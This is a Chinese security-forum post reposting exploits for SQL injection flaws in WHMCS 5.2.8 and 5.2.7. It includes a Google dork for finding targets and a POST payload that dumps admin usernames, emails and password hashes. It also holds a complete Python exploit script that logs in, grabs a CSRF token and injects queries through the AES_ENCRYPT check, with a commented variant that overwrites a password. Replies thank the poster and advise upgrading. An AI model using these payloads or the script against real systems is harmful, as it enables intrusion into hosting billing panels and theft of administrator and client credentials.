WHMCS 5.2.8 – SQL Injection Vulnerability

Diana

# Google Dork: "powered by WHMCS"
# Exploit Author: g00n ( Xploiter.net )
# Vendor Homepage: http://www.whmcs.com/
# Software Link: http://www.whmcs.com/
# Version: 5.2.8
# Tested on: Windows, Linux

Vulnerable file: /includes/dbfunctions.php

POC:

select_query() function is vulnerable due to Register Globals

Example:

/whmcs/viewticket.php

[AppleScript] 查看源码 复制代码

POST: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#

----------------------------------------------------------------上面和下面版本不一样

WHMCS 5.2.7 – SQL Injection Vulnerability

漏洞文件 /includes/dbfunctions.php:

[AppleScript] 查看源码 复制代码

<?php
function update_query($table, $array, $where) {
    #[...]
    if (substr($value, 0, 11) == 'AES_ENCRYPT') {
        $query .= $value.',';
        continue;
    }
    #[...]
    $result = mysql_query($query, $whmcsmysql);
 }
?>

EXP:

[AppleScript] 查看源码 复制代码

#!/usr/bin/env python
# 2013/10/03 - WHMCS 5.2.7 SQL Injection
# [url]http://localhost.re/p/whmcs-527-vulnerability[/url]
  
url = 'http://clients.target.com/' # wopsie dopsie
user_email = 'mysuper@hacker.account' # just create a dummie account at /register.php
user_pwd = 'hacker'
  
import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
  
def exploit(sql):
    print "Doing stuff: %s" % sql
    r = urlopen(Request('%sclientarea.php?action=details' % url, data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua, "Cookie": user[0]})).read()
    return re.search(r'(id="firstname" value="(.*?)")', r).group(2)
  
def login():
    print "Getting CSRF token"
    r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
    csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r.read()).group(2)
    cookie = r.info()['set-cookie'].split(';')[0]
    print "Logging in"
    r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email, user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read()
    if 'dologin.php' in r:
        sys.exit('Unable to login')
    else:
        return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")', r).group(2)]
  
user = login()
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get admins
print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients
  
# oh you want to be evil
#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as x)#" % user_email)

zhoujian017

sf...沙发

热心网友1

感谢分享！这个 SQL 注入漏洞利用起来比较直接，尤其是在旧版本还没禁用 Register Globals 的环境下，通过 viewticket.php 就能提取管理员凭据，很危险。建议还在用 5.2.x 的用户尽快升级到最新版本，或者至少打上官方补丁。另外附件里 python 脚本也挺有参考价值的。辛苦了！

热心网友1

这个漏洞挺有年头了，但信息整理得很清楚，感谢分享。对于还在用老版本的朋友，直接升级到5.3以上应该就能避开这个注入风险了。

热心网友5

感谢楼主的分享！这个漏洞信息很详细，特别是提供了 POC 和 EXP 代码，对安全测试和加固很有帮助。WHMCS 用户建议及时升级到最新版本，或者对 /includes/dbfunctions.php 做好输入过滤和参数化查询。再次谢谢 Diana 的整理！